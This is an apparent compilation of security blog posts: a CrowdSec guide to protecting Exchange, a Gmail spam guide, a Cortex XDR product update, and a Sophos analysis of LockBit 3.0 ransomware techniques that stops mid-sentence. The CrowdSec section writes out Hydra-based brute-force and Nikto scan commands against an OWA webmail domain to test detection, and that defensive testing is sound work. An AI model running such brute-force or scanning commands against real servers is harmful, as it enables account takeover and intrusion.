Although moving Google employees to virtual desktops in the cloud was a significant engineering undertaking, the benefits have been just as significant. Making this switch has boosted employee productivity and satisfaction, enhanced security, increased efficiency, and provided noticeable improvements in performance and user experience. In short, cloud-based desktops are helping us transform how Googlers get their work done. During the pandemic, we saw the benefits of virtual desktops in a critical time. Employees had access to their virtual desktop from anywhere in the world, which kept our workforce safer and reduced transmission vectors for COVID-19. We’re excited for a future where more and more of our employees are computing in the cloud as we continue to embrace the work-from-anywhere model and as we continue to add new features and enhanced capabilities to Compute Engine!

Source :
https://cloud.google.com/blog/topics/developers-practitioners/googles-virtual-desktop-future

How to Protect Your Microsoft Exchange Server 2019 with CrowdSec

Follow this step-by-step guide on installing CrowdSec on a Microsoft Exchange server to better protect against common cyberattacks and new threats.

This article is a direct translation of Florian Burnel’s article published on IT Connect. You can find the original article here.

We also have an article on installing CrowdSec on a Windows server with a tutorial on blocking brute force attacks on an RDP connection and blocking a scan of a website hosted on an IIS server.

I. Presentation

In this tutorial, we will dive into how to secure a Microsoft Exchange mail server with the CrowdSec collaborative firewall! Installing CrowdSec on a Microsoft Exchange server will allow you to protect against common attacks but also new threats.

A good example is the ProxyNotShell security breach, which made headlines in October 2022: CrowdSec can detect exploit attempts and block the malicious IP addresses, thanks to its collection covering IIS and attacks based on the HTTP/HTTPS protocols. Other examples are more classic cases, such as brute force attacks on the Exchange webmail interface.

Depending on the architecture of your information system (for example, the presence or absence of a reverse proxy), an Exchange server will be more or less exposed to the Internet. In any case, it must be able to communicate outward and be reachable from the outside in order to send and receive email for your users’ mailboxes.

This same server is also reachable through Webmail which allows users to check their emails from a browser. This implies the presence of an IIS web server that hosts both Webmail and Exchange Admin Center. Furthermore, when an Exchange server is compromised by a cyberattack, this mainly involves HTTP/HTTPS access: hence the interest in protecting yourself.

CrowdSec Windows - Protect OWA

This article is a continuation of my first article on installing an Exchange Server 2019 server. For the installation of the Microsoft Exchange Server itself, I invite you to read my previous tutorial.

In addition, I also encourage you to restrict access to the Exchange admin center.

II. Setting up CrowdSec on Windows

A. Installing the CrowdSec Agent

I already wrote about how to install CrowdSec on Windows in a previous article, but that was the Alpha version. Now, the CrowdSec agent for Windows is available in a stable version, which means that it is ready to be implemented in production.

Note: if you have previously installed the alpha version on your server, you must uninstall it before installing this new CrowdSec version.

First, you must download the MSI package from the official CrowdSec GitHub repository.

During installation, the CrowdSec MSI package performs the following actions:

  • Install CrowdSec itself
  • Integrate the Windows Collection (details are available here)
  • Register the CrowdSec instance with the Central API
  • Register the CrowdSec service within Windows (automatic start)

Once the download is complete, begin the installation. Just follow the steps without making any changes, then allow about two minutes for the Agent to fully install.

Install CrowdSec on Windows for Exchange Server

As soon as the CrowdSec Agent is in place, we have access to the “cscli” command-line tool, which allows you to manage your CrowdSec instance.

To list current collections:

cscli collections list

To list the current bouncers (none by default):

cscli bouncers list

CrowdSec Windows - List collections and bouncers

B. Installing the IIS Collection

On Windows, CrowdSec natively sets up the “crowdsecurity/windows“ collection, but it is not enough to protect your Exchange server. We need to add the IIS collection, which will also pull in two more collections used to detect web attacks.

This collection is installed with the following command:

cscli collections install crowdsecurity/iis

A few seconds after adding it, we can list the installed collections to confirm that the new collections are present.

CrowdSec Windows - List the collections

To justify what I said in the introduction about the ProxyNotShell vulnerability, we can look at the details of the “crowdsecurity/http-cve” collection. Here, we can see the presence of a detection scenario named “crowdsecurity/CVE-2022-41082” corresponding to this vulnerability.

cscli collections inspect crowdsecurity/http-cve

CrowdSec Windows - http-cve collection details

Let’s go to the next step.

C. Installing Windows Firewall Bouncer

Now, we must set up the “firewall” bouncer for Windows, otherwise attacks will be detected but not blocked. Click on the following link, then on the “Download” button to download the MSI package: https://hub.crowdsec.net/author/crowdsecurity/bouncers/cs-windows-firewall-bouncer

The installation is done in only a few clicks: just follow the wizard.

CrowdSec Windows - Installing the firewall bouncer

Once done, the command below will confirm that the bouncer is present.

cscli bouncers list

CrowdSec Windows - List the bouncers

Let’s go to the next step.

D. Add IIS log support

For CrowdSec to analyze the logs generated by IIS, and by extension the access to Exchange’s OWA and ECP portals, we must tell it where to find the log files it should analyze.

To do this, you will need to edit the following: 

C:\ProgramData\CrowdSec\config\acquis.yaml

Then add the following lines:

---
use_time_machine: true
filenames:
  - C:\inetpub\logs\LogFiles\*\*.log
labels:
  type: iis

Notice the “dynamic” path, characterized by the wildcard characters: “C:\inetpub\logs\LogFiles\*\*.log”. This value allows CrowdSec to find and read the log files located under the “C:\inetpub\logs\LogFiles\” tree.

In addition to the path to the log files, this configuration block contains a parameter named use_time_machine. It is important because IIS does not write logs to the log file in real time; instead, it writes new events in blocks, every minute. Thanks to this parameter, CrowdSec reads the date and time of each line to keep its bearings and process the events chronologically, which avoids false positives.

However, if you are not using the log files but the Event Viewer instead, you should use this configuration block rather than the one above:

---
source: wineventlog
event_channel: Microsoft-IIS-Logging/Logs
event_ids:
  - 6200
event_level: information
labels:
  type: iis

Save the acquis.yaml file and close it.

Finally, we need to restart CrowdSec. This operation is done in PowerShell with this command:

Restart-Service crowdsec
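
To check that the IIS log files are actually being read, one quick verification step (not part of the original tutorial) is to consult the acquisition metrics:

cscli metrics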

CrowdSec setup is complete! Now let’s test it!

III. Is the Exchange server protected?

A. Brute force on OWA – Webmail Exchange 

There are several possible methods to perform a brute force attack on OWA. Of course, you could do this manually for testing, but you could also use something a bit more automated to simulate a brute force attack. Here, we will use a Bash script named “OWA BRUTE” that runs Hydra (an offensive tool that supports many protocols for testing the authentication of services, equipment, etc.) with parameters specific to Outlook Web Access.

The script is available on GitHub.

First, we need to install Hydra and Git. The first one is a prerequisite to use the script and perform our attack, while the second one will be used to clone the GitHub repository to get the Bash script (you can also copy and paste the script in a file…).

sudo apt-get update

sudo apt-get install hydra git

Once this is done, we clone the GitHub project in “/home/florian”:

cd /home/florian/

git clone

Then, we create a file “users.txt” in which we indicate some names of users. You can also recover a list on the Internet.

nano /home/florian/owabrute/users.txt

In the same sense, we create a file “passwords.txt” with the passwords to test.

nano /home/florian/owabrute/passwords.txt

Then, we move to the OWA BRUTE directory to add the execution rights on the Bash script.

cd /home/florian/owabrute/

chmod +x owabrute.sh

All that remains is to launch the attack by targeting “mail.domaine.fr” and then using our previously created files.

./owabrute.sh -d mail.domaine.fr -u ./users.txt -p ./passwords.txt

We can see that the script will test each combination in turn. In the end, it will indicate whether or not it succeeded in finding a valid combination. However, CrowdSec will intervene…


Indeed, if I look at my Exchange server, I can see that there is a new IP address blocked because of brute force (“crowdsecurity/windows-bf”). The CrowdSec agent has correctly blocked the IP address that caused this attack.
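
To see the corresponding block from the command line as well (a check not shown in the original screenshots), you can list the active decisions:

cscli decisions list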


Since we are here to test, we can unblock our IP address manually:

cscli decisions delete --ip X.X.X.X

Let’s move on to a second test.

B. Scan Web on OWA

If someone tries to scan your web server (the IIS server used by Exchange, in this case), they can rely on various tools, including Nikto, which is used to analyze the security level of a web server. For this example, OWA will be scanned with the Nikto tool: we will see whether CrowdSec detects what is happening on the IIS server…

First of all, let’s install this tool:

sudo apt-get update

sudo apt-get install nikto

Then, we launch the scan against the webmail:

nikto -h https://mail.domaine.fr/owa

The analysis will take several minutes…


…Except that after a while, CrowdSec will realize that this web client is performing suspicious actions and will decide to block it. In the example below, we can see the reason “http-sensitive-files”, which means that the client tried to access sensitive files.

In this second example, where we performed a completely different action compared to the first attempt, CrowdSec also managed to detect our malicious actions.

IV. Conclusion

We have just seen how to set up the CrowdSec agent on Windows to protect a Microsoft Exchange mail server! Here, I took the example of Exchange Server 2019, but it also applies to earlier versions. With these two quick but concrete examples, we can see the effectiveness of CrowdSec!

I’ll also take this moment to remind you of the existence of the CrowdSec Console which allows you to follow the alerts raised by one or more CrowdSec Agents from a web-based console. To learn more about the implementation and all the functionalities, you can visit the Console page.

WRITTEN BY

Florian Burnel

Source :
https://www.crowdsec.net/blog/how-to-protect-microsoft-exchange-server-crowdsec

How to keep your Gmail Inbox free of Spam and Promotions

Gmail Spam Featured Image

Using its time-tested and refined algorithms, Gmail does a pretty good job of trying to keep our inboxes free of Spam, Junk emails, and unwanted promotions. It even utilizes inbox tabs to categorize your promotions, social, updates, and forum emails and keep them out of your primary email tab where your actual new emails are shown. However, even with all of these tools, filtering out unwanted emails is not 100% perfect, and a little manual input from us can go a long way. There are three ways that you can train Gmail to filter out unwanted emails from your inbox, which are as follows:

Inbox Categories

The first is the aforementioned inbox categories that can separate certain types of emails and display them on a different tab. Although initially done programmatically, this can be further tweaked so that you have the desired results.

To turn this feature on, navigate to your Gmail settings, then click on the Inbox tab. Make sure the Inbox type is set to “Default,” then add a checkmark to the categories you wish to have in a separate tab. If you just want to keep out marketing emails, add a check to the “Promotions” category, then click “Save Changes.”

You will now have a “Promotions” tab in your emails that you have the option to check if desired. If you see emails in there that you’d rather have go straight to your Primary tab, just drag them out and into the main tab. Gmail will then ask if you would like it to automatically do the same for future emails from the same sender.

I just want the steps!

  1. Go to Gmail settings
  2. Click on the Inbox tab
  3. Make sure the Inbox type is set to “Default”
  4. Add a check to the “Promotions” category
  5. Click on “Save Changes”

Gmail Filters

Utilizing Gmail filters is a manual process at first, but completely pays off once it’s set up and starts automatically filtering based on the parameters you have set. You can be very deliberate with your email filters, setting specific email addresses and/or domains to automatically go to Spam, or you can be more general and block out an entire email list that you may have been unwillingly made a part of. To do this, open the Spam email you would like to filter out in the future, then click on the three-dot menu, and select “Filter messages like these.”

Depending on the email, if Gmail detects that this was sent to a mailing list and not you directly, you will see an option to filter the email based on the list itself. Click on “Create filter,” and then choose to either archive or delete the email. If there are other emails in your inbox that match this filter, you should also see an option to apply it to all the matching conversations. Once you’ve chosen your desired action(s), click on “Create filter.”

I just want the steps!

  1. Open the Spam email you would like to filter out in the future
  2. Click on the three-dot menu
  3. Select “Filter messages like these”
  4. Click on “Create filter,” and then choose to either archive or delete the email
  5. Select option to apply it to all the matching conversations
  6. Click on “Create filter”

Reporting Spam in Inbox

Lastly, you can train Gmail to programmatically unsubscribe from an email list, mark the email as Spam, or do both at the same time. The latter is the most effective and recommended method, as it not only tries to unsubscribe you from the list but also marks it as Spam in case unsubscribing doesn’t go through as it should.

To just unsubscribe, you can click on the “Unsubscribe” link that appears beside the sender’s email address. Once you click there, you will receive a notification asking you to confirm that you want to go ahead and unsubscribe.

To both unsubscribe and mark the email as Spam, click on the exclamation mark that appears in the menu above the email, then confirm that you want to “Report spam and unsubscribe.”

I just want the steps!

  1. To just unsubscribe, click on the “Unsubscribe” link that appears beside the sender’s email address, then confirm by clicking the blue “Unsubscribe” button
  2. To both unsubscribe and mark the email as Spam, click on the exclamation mark that appears in the menu above the email
  3. At the confirmation popup, click on “Report spam and unsubscribe”

Source :
https://chromeunboxed.com/how-to-filter-spam-promotions

Protect Your iOS Devices with Cortex XDR Mobile

Cortex XDR 3.5 and Cortex XDR Agent 7.9 Deliver Stronger Security, Better Search and Broader Coverage, Including iOS Support

Your employees probably expect to work from anywhere, at any time they want, on any device. With the rise of remote work, users are accessing business apps and data from mobile devices more than ever before. Cortex XDR Mobile for iOS lets you protect your users from mobile threats, such as malicious URLs in text messages and malicious or unwanted spam calls.

Cortex XDR Mobile for iOS is just one of over 40 new features in our Cortex XDR 3.5 and Cortex XDR Agent 7.9 releases. In addition to iOS protection, we’ve bolstered endpoint security, improved the flexibility of XQL Search, and expanded visibility and normalization to additional data sources. Even more new advancements make it easier than ever to manage alert exceptions and granularly control access to alerts and incidents.

Let’s dive in and take a deeper look at the new capabilities of Cortex XDR 3.5 and Cortex XDR Agent 7.9.

iOS Protection with Cortex XDR Mobile

With the rapid shift to remote work, flexible BYOD policies are now a must-have for many companies. Whether employees are working at home, from a café, or in a corporate office, they often have a phone within reach, and for good reason. 62% of U.S. workers say mobile phones or tablets help them be productive at work, according to a broad 2021 survey.

Phishing and Smishing and Spam, Oh My!

If you own a smartphone (like 85% of Americans do) you’ve probably received suspicious text messages claiming your bank or Amazon or PayPal account has been blocked. Or you’ve received messages saying that you need to click a link to complete a USPS shipment. And if you are receiving these messages, you can assume your users are also receiving similar messages. It’s only a matter of time before a user clicks one of these links and supplies their credentials, possibly even the same credentials they use at work. These smishing attacks, or phishing performed through SMS, are on the rise.

If your organization is like many others, you’ve probably deployed an email security solution that filters spam and phishing URLs. However, you may not be protecting your mobile devices – BYOD or corporate-owned – from spam calls and phishing attacks.

Screenshot of being protected by Cortex XDR, showing security events.

With Cortex XDR Mobile for iOS, you can now secure iOS devices from advanced threats like smishing. The Cortex XDR agent blocks malicious URLs in SMS messages with URL filtering powered by Unit 42 threat intelligence. It can also block spam calls, safeguarding your users from unwanted and potentially fraudulent calls. Users can also report a spam call or message, allowing the Cortex XDR administrator to block the phone number.

Hunting Down Jailbroken Devices

Some of your iPhone users might “jailbreak” their phones to remove software restrictions imposed by Apple. Once they gain root access to their phones, they can install software not available in the App Store. Jailbreaking increases the risk of downloading malware. It can also create stability issues.

The Cortex XDR agent detects jailbroken devices, including evasion techniques designed to thwart security tools. Overall, the Cortex XDR agent provides strong protection for iPhones and iPads, while balancing privacy and usability requirements.

Now you can protect a broad set of endpoints, mobile devices and cloud workloads in your organization, including Windows, Linux, Mac, Android, Chrome and now iOS, with the Cortex XDR agent.

In-Process Shellcode Protection

Threat actors can attempt to bypass endpoint security controls using shellcode to load malicious code into memory. Cortex XDR’s patent-pending in-process shellcode protection module blocks these attempts. To understand how, let’s look at a common attack sequence.

After threat actors have gained initial access to a host, they typically perform a series of steps, including analyzing the host operating system and delivering a malicious payload to the host.

They may use a stager to deliver the payload directly into memory rather than installing malware on the host machine. By loading the payload directly into memory, they can circumvent many antivirus solutions that will either ignore or perform more limited security checks on memory.

Many red team tools or hacking tools, such as Cobalt Strike, Sliver or Brute Ratel, have made it easier for attackers to perform these sophisticated steps.

If a process, including a benign process, executes and allocates memory in a suspicious way, the Cortex XDR agent will single out that memory allocation and extract and analyze the buffer. If the Cortex XDR agent detects any signature or indicator that the payload is malicious, the agent conducts additional analysis on the process and shellcode, including analyzing the behavior of the code and the process, using EDR data enrichment.

If the Cortex XDR agent determines the shellcode or the process loaded by the shellcode are malicious, it will terminate the process that loaded the shellcode and the allocated memory. By killing the process chain, or the “causality,” Cortex XDR prevents the malicious software from executing.

In-process shellcode protection is a patent-pending technology that helps detect and prevent the use of hacking tools and malware.

Our in-process shellcode protection will block red team and hacking tools from loading malicious code, without needing to individually identify and block each tool.

This means that if a never-before-seen hacking tool is released, Cortex XDR can prevent the tool from using shellcode to load a payload into memory.

Cortex XDR will terminate the implant once it’s loaded on the machine before it can do anything malicious.

Financial Malware and Cryptomining Protection

Whether stealing from bank accounts or mining for cryptocurrency, cybercriminals always have new tricks up their collective sleeves. To combat these dangerous threats, we’ve added two new behavior-based protection modules in Cortex XDR Agent 7.9. Let’s take a brief look at these threats and how you can mitigate them with Cortex XDR.

Banking Trojans emerged over a decade ago, typically stealing banking credentials by manipulating web browser sessions and logging keystrokes. Criminals deployed large networks of Trojans, such as Zeus, Trickbot, Emotet and Dridex, over the years. They infected millions of computers, accessed bank accounts, and transferred funds from victims. Now, threat actors often use these Trojans to deliver other types of malware to victims’ devices, like ransomware.

Cryptojacking, or malicious and unauthorized mining for cryptocurrency, is an easy way for threat actors to make money. Threat actors often target cloud services to mine cryptocurrency because cloud services provide greater scale, allowing them to mine cryptocurrency faster than a traditional endpoint. According to Unit 42 research, 23% of organizations with cloud assets are affected by cryptojacking, and it’s still the most common attack on unsecured Kubernetes clusters.

The new banking malware threat protection and cryptominers protection modules in the Cortex XDR agent automatically detect and stop the behaviors associated with these attacks. For example, to block banking malware, the module will block attempts to infect web browsers during process creation, as well as block other browser injection techniques. The cryptominers protection module will detect unusual cryptographic API or GPU access and other telltale signs of cryptojacking.

Both of these modules augment existing banking and cryptomining protection already available with Cortex XDR. You can enable, disable or set these modules to alert-only mode on Windows, Linux and macOS endpoints. You can also create exceptions per module or module rule for granular policy control.

Scope-Based Access Control for Alerts and Incidents

To address data privacy and security requirements, you might wish to control which Cortex XDR alerts and incidents your users can view. With Cortex XDR 3.5, you can control which alerts and incidents users can access based on endpoint and endpoint group tags.

Screenshot showing the update user page.

You can tag endpoints or endpoint groups by geographic location, organization, business unit, department or any other segmentation of your choice. Then, you can flexibly manage access to alerts and incidents based on the tags you’ve defined.

Alert Management Made Simple

Cortex XDR 3.5 provides several enhancements to ease alert management and reduce noise. First, you can now view and configure alert exclusions and agent exception policies from a central location. You are able to configure which alerts to suppress. You can also configure exceptions to IOC and BIOC rules to prevent matching events from triggering alerts.

A new Disable Prevention Rules feature enables you to granularly exclude prevention actions triggered by specific security modules. The Legacy Exceptions window shows legacy “allow list rules,” which are still available.

Screenshot of Cortex XDR page on IOC/BIOC suppression rules.

XQL Search Integration with Vulnerability Assessment

To help you quickly hunt down threats and discover high risk assets, we have enhanced our XQL search capability. Now you can uncover vulnerable endpoints and gain valuable exposure context for investigations by viewing Common Vulnerabilities and Exposures (CVEs), as well as installed applications per endpoint. You can also list all CVEs detected in your organization, together with the endpoints and applications impacted by each CVE.

In addition, XQL search supports several new options that offer greater flexibility and control to streamline investigation and response. Notably, a new top stage command reveals the top values for a specific field quickly, with minimal memory usage. By default the top stage command displays the top ten results.

For a complete list of new features, see the Cortex XDR 3.5 and Cortex XDR Agent 7.9 release notes. To learn more about the in-process shellcode protection feature, attend the session “Today’s Top Endpoint Threats, and Advancements to Stop Them” on Tuesday, December 13, at 10:30 AM PST at the Ignite ’22 Conference.

Source :
https://www.paloaltonetworks.com/blog/2022/12/ios-devices-with-cortex-xdr-mobile/

LockBit 3.0 ‘Black’ attacks and leaks reveal wormable capabilities and tooling

Reverse-engineering reveals close similarities to BlackMatter ransomware, with some improvements

A postmortem analysis of multiple incidents in which attackers eventually launched the latest version of LockBit ransomware (known variously as LockBit 3.0 or ‘LockBit Black’), revealed the tooling used by at least one affiliate. Sophos’ Managed Detection and Response (MDR) team has observed both ransomware affiliates and legitimate penetration testers use the same collection of tooling over the past 3 months.

Leaked data about LockBit, showing the backend controls for the ransomware, also seems to indicate that the creators have begun experimenting with scripting that would allow the malware to “self-spread” using Windows Group Policy Objects (GPO) or the tool PSExec. This would potentially make it easier for the malware to move laterally and infect computers without affiliates needing to know how to take advantage of these features themselves, potentially speeding up the time it takes them to deploy the ransomware and encrypt targets.

A reverse-engineering analysis of the LockBit functionality shows that the ransomware has carried over most of its functionality from LockBit 2.0 and adopted new behaviors that make it more difficult to analyze by researchers. For instance, in some cases it now requires the affiliate to use a 32-character ‘password’ in the command line of the ransomware binary when launched, or else it won’t run, though not all the samples we looked at required the password.

We also observed that the ransomware runs with LocalServiceNetworkRestricted permissions, so it does not need full Administrator-level access to do its damage (supporting observations of the malware made by other researchers).

Most notably, we’ve observed (along with other researchers) that many LockBit 3.0 features and subroutines appear to have been lifted directly from BlackMatter ransomware.

Is LockBit 3.0 just ‘improved’ BlackMatter?

Other researchers previously noted that LockBit 3.0 appears to have adopted (or heavily borrowed) several concepts and techniques from the BlackMatter ransomware family.

We dug into this ourselves, and found a number of similarities which strongly suggest that LockBit 3.0 reuses code from BlackMatter.

Anti-debugging trick

BlackMatter and LockBit 3.0 use a specific trick to conceal their internal function calls from researchers. In both cases, the ransomware loads/resolves a Windows DLL from its hash tables, which are based on ROT13.

It will try to get pointers to the functions it needs by searching the PEB (Process Environment Block) of the module. It will then look for a specific binary data marker in the code (0xABABABAB) at the end of the heap; if it finds this marker, it means someone is debugging the code, so it doesn’t save the pointer and the ransomware quits.

After these checks, it will create a special stub for each API it requires. There are five different types of stubs that can be created (chosen at random). Each stub is a small piece of shellcode that performs API hash resolution on the fly and jumps to the API address in memory. This makes reversing with a debugger more difficult.

Screenshot of disassembler code
LockBit’s 0xABABABAB marker

SophosLabs has put together a CyberChef recipe for decoding these stub shellcode snippets.

Output of a CyberChef recipe
The first stub, as an example (decoded with CyberChef)

Obfuscation of strings

Many strings in both LockBit 3.0 and BlackMatter are obfuscated, resolved during runtime by pushing the obfuscated strings on to the stack and decrypting with an XOR function. In both LockBit and BlackMatter, the code to achieve this is very similar.
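
As a rough illustration of the general pattern (a minimal Python sketch of XOR string decoding, not LockBit’s or BlackMatter’s actual routine; the key and encoded bytes are invented):

import itertools

def xor_decode(blob: bytes, key: bytes) -> bytes:
    # XOR each obfuscated byte with a repeating key, mirroring the runtime decryption step
    return bytes(b ^ k for b, k in zip(blob, itertools.cycle(key)))

encoded = bytes([0x26, 0x30, 0x36, 0x27, 0x30, 0x21])  # hypothetical obfuscated string
print(xor_decode(encoded, b"\x55"))                    # -> b'secret'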

Screenshot of disassembler code
BlackMatter’s string obfuscation (image credit: Chuong Dong)

Georgia Tech student Chuong Dong analyzed BlackMatter and showed this feature on his blog, with the screenshot above.

Screenshot of disassembler code
LockBit’s string obfuscation, in comparison

By comparison, LockBit 3.0 has adopted a string obfuscation method that looks and works in a very similar fashion to BlackMatter’s function.

API resolution

LockBit uses exactly the same implementation as BlackMatter to resolve API calls, with one exception: LockBit adds an extra step in an attempt to conceal the function from debuggers.

Screenshot of disassembler code
BlackMatter’s dynamic API resolution (image credit: Chuong Dong)

The array of calls performs precisely the same function in LockBit 3.0.

Screenshot of disassembler code
LockBit’s dynamic API resolution

Hiding threads

Both LockBit and BlackMatter hide threads using the NtSetInformationThread function, with the parameter ThreadHideFromDebugger. As you probably can guess, this means that the debugger doesn’t receive events related to this thread.
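
For reference, the underlying Windows API call looks roughly like this ctypes sketch (an illustration of the generic technique, not code taken from either ransomware; it only runs on Windows):

import ctypes

ThreadHideFromDebugger = 0x11  # THREADINFOCLASS value used to hide a thread from debuggers
ntdll = ctypes.WinDLL("ntdll")
kernel32 = ctypes.WinDLL("kernel32")

# Hide the current thread: an attached debugger stops receiving events for it
current_thread = kernel32.GetCurrentThread()
ntdll.NtSetInformationThread(current_thread, ThreadHideFromDebugger, None, 0)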

Screenshot of disassembler code
LockBit employs the same ThreadHideFromDebugger feature as an evasion technique

Printing

LockBit, like BlackMatter, sends ransom notes to available printers.

Screenshot of disassembler code
LockBit can send its ransom notes directly to printers, as BlackMatter can do

Deletion of shadow copies

Both ransomware families sabotage the infected computer's ability to recover from file encryption by deleting the Volume Shadow Copy files.

LockBit calls the IWbemLocator::ConnectServer method to connect with the local ROOT\CIMV2 namespace and obtain the pointer to an IWbemServices object that eventually calls IWbemServices::ExecQuery to execute the WQL query.
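The pattern described above, condensed into a sketch (error handling and the usual CoInitializeSecurity setup are omitted for brevity; the Win32_ShadowCopy query is the one commonly used for this purpose and is an assumption here, not quoted from the sample):

```cpp
// Condensed sketch of deleting shadow copies through WMI, as described above.
#include <windows.h>
#include <wbemidl.h>
#include <comdef.h>
#pragma comment(lib, "wbemuuid.lib")

void delete_shadow_copies_via_wmi()
{
    CoInitializeEx(nullptr, COINIT_MULTITHREADED);

    IWbemLocator*  locator  = nullptr;
    IWbemServices* services = nullptr;

    CoCreateInstance(CLSID_WbemLocator, nullptr, CLSCTX_INPROC_SERVER,
                     IID_IWbemLocator, reinterpret_cast<void**>(&locator));

    // Connect to the local ROOT\CIMV2 namespace, as described above.
    locator->ConnectServer(_bstr_t(L"ROOT\\CIMV2"), nullptr, nullptr, nullptr,
                           0, nullptr, nullptr, &services);

    IEnumWbemClassObject* results = nullptr;
    services->ExecQuery(_bstr_t(L"WQL"),
                        _bstr_t(L"SELECT * FROM Win32_ShadowCopy"),   // assumed WQL query
                        WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY,
                        nullptr, &results);

    IWbemClassObject* obj = nullptr;
    ULONG returned = 0;
    while (results && results->Next(WBEM_INFINITE, 1, &obj, &returned) == S_OK) {
        VARIANT path;
        VariantInit(&path);
        obj->Get(L"__PATH", 0, &path, nullptr, nullptr);      // instance path of the copy
        services->DeleteInstance(path.bstrVal, 0, nullptr, nullptr);
        VariantClear(&path);
        obj->Release();
    }

    if (results)  results->Release();
    if (services) services->Release();
    if (locator)  locator->Release();
    CoUninitialize();
}
```

Doing this in-process through COM avoids spawning an easily flagged vssadmin.exe or wmic.exe command line, which is one reason the approach is popular with ransomware authors.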

Screenshot of disassembler code
BlackMatter code for deleting shadow copies (image credit: Chuong Dong)

LockBit’s method of doing this is identical to BlackMatter’s implementation, except that it adds a bit of string obfuscation to the subroutine.

Screenshot of disassembler code
LockBit’s deletion of shadow copies

Enumerating DNS hostnames

Both LockBit and BlackMatter enumerate hostnames on the network by calling NetShareEnum.
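For reference, a minimal benign use of the same API looks like the sketch below; the server name passed in would be hypothetical, and this is not the malware's code.

```cpp
// Generic sketch: list the shares exposed by a given host with NetShareEnum.
#include <windows.h>
#include <lm.h>
#include <cstdio>
#pragma comment(lib, "netapi32.lib")

void list_shares(LPWSTR server)   // e.g. L"\\\\FILESERVER01" (hypothetical host)
{
    PSHARE_INFO_1 buf = nullptr;
    DWORD entries = 0, total = 0, resume = 0;

    NET_API_STATUS status = NetShareEnum(server, 1,
                                         reinterpret_cast<LPBYTE*>(&buf),
                                         MAX_PREFERRED_LENGTH,
                                         &entries, &total, &resume);
    if (status != NERR_Success) return;

    for (DWORD i = 0; i < entries; ++i)
        wprintf(L"%s\n", buf[i].shi1_netname);   // share name on the remote host

    NetApiBufferFree(buf);
}
```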

Screenshot of disassembler code
BlackMatter calls NetShareEnum() to enumerate hostnames… (image credit: Chuong Dong)

In the source code for LockBit, the function looks like it has been copied, verbatim, from BlackMatter.

Screenshot of disassembler code
…as does LockBit

Determining the operating system version

Both ransomware strains use identical code to check the OS version – even using the same return codes (although this is a natural choice, since the return codes are hexadecimal representations of the version number).
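As an illustration of the return-code idea (a generic sketch, not the routine from either family): query the version from ntdll and pack major/minor into a single hex value, so Windows 7 (6.1) becomes 0x0601 and Windows 10 (10.0) becomes 0x0A00.

```cpp
// Generic sketch: report the OS version as a packed hexadecimal code.
#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *RtlGetVersion_t)(PRTL_OSVERSIONINFOW);

DWORD os_version_code()
{
    RTL_OSVERSIONINFOW info = {};
    info.dwOSVersionInfoSize = sizeof(info);

    // RtlGetVersion reports the true version even when compatibility shims are active.
    auto fn = reinterpret_cast<RtlGetVersion_t>(
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion"));
    if (fn) fn(&info);

    return (info.dwMajorVersion << 8) | info.dwMinorVersion;   // e.g. 0x0A00 for Windows 10
}
```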

Screenshot of disassembler code
BlackMatter’s code for checking the OS version (image credit: Chuong Dong)
Screenshot of disassembler code
LockBit’s OS enumeration routine

Configuration

Both ransomware families contain embedded configuration data inside their binary executables. We noted that LockBit decodes its config in a similar way to BlackMatter, albeit with some small differences.

For instance, BlackMatter saves its configuration in the .rsrc section, whereas LockBit stores it in .pdata.

Screenshot of disassembler code
BlackMatter’s config decryption routine (image credit: Chuong Dong)

LockBit also uses a different linear congruential generator (LCG) algorithm for decoding.
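A generic sketch of the idea: an LCG seeded from the binary produces a keystream that is XORed over the embedded config blob. The multiplier, increment, and seed handling below are placeholders (MSVC rand()-style constants), not the constants either family actually uses.

```cpp
// Generic sketch of LCG-keystream config decoding (placeholder constants).
#include <cstdint>
#include <cstddef>

void lcg_decode(uint8_t* blob, size_t len, uint32_t seed)
{
    uint32_t state = seed;                        // seed would be derived from the sample
    for (size_t i = 0; i < len; i += 4) {
        state = state * 0x343FDu + 0x269EC3u;     // placeholder LCG step (MSVC rand-style)
        const uint32_t ks = state;
        for (size_t j = 0; j < 4 && i + j < len; ++j)
            blob[i + j] ^= static_cast<uint8_t>(ks >> (8 * j));   // XOR keystream over blob
    }
}
```

Because XOR is its own inverse, re-running the routine with the same seed encodes and decodes identically.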

Screenshot of disassembler code
LockBit’s config decryption routine

Some researchers have speculated that the close relationship between the LockBit and BlackMatter code indicates that one or more of BlackMatter's coders were recruited by LockBit, that LockBit bought the BlackMatter codebase, or that developers from the two groups collaborated. As we noted in our white paper on multiple attackers earlier this year, it's not uncommon for ransomware groups to interact, either inadvertently or deliberately.

Either way, these findings are further evidence that the ransomware ecosystem is complex and fluid. Groups reuse, borrow, or steal each other’s ideas, code, and tactics as it suits them. And, as the LockBit 3.0 leak site (containing, among other things, a bug bounty and a reward for “brilliant ideas”) suggests, that gang in particular is not averse to paying for innovation.

LockBit tooling mimics what legitimate pentesters would use

Another aspect of the way LockBit 3.0’s affiliates deploy the ransomware is that their work is becoming very difficult to distinguish from that of a legitimate penetration tester – aside from the fact that a legitimate penetration tester has, of course, been contracted by the targeted company beforehand and is legally allowed to perform the test.

The tooling we observed the attackers using included a package from GitHub called Backstab. The primary function of Backstab is, as the name implies, to sabotage the tooling that analysts in security operations centers use to monitor for suspicious activity in real time. The utility uses Microsoft’s own Process Explorer driver (signed by Microsoft) to terminate protected anti-malware processes and disable EDR utilities. Both Sophos and other researchers have observed LockBit attackers using Cobalt Strike, which has become a nearly ubiquitous attack tool among ransomware threat actors, and directly manipulating Windows Defender to evade detection.

Further complicating the parentage of LockBit 3.0 is the fact that we also encountered attackers using a password-locked variant of the ransomware, called lbb_pass.exe, which has also been used by attackers that deploy REvil ransomware. This may suggest that there are threat actors affiliated with both groups, or that threat actors not affiliated with LockBit have taken advantage of the leaked LockBit 3.0 builder. At least one group, BlooDy, has reportedly used the builder, and if history is anything to go by, more may follow suit.

LockBit 3.0 attackers also used a number of publicly-available tools and utilities that are now commonplace among ransomware threat actors, including the anti-hooking utility GMER, a tool called AV Remover published by antimalware company ESET, and a number of PowerShell scripts designed to remove Sophos products from computers where Tamper Protection has either never been enabled, or has been disabled by the attackers after they obtained the credentials to the organization’s management console.

We also saw evidence the attackers used a tool called Netscan to probe the target’s network, and of course, the ubiquitous password-sniffer Mimikatz.

Incident response makes no distinction

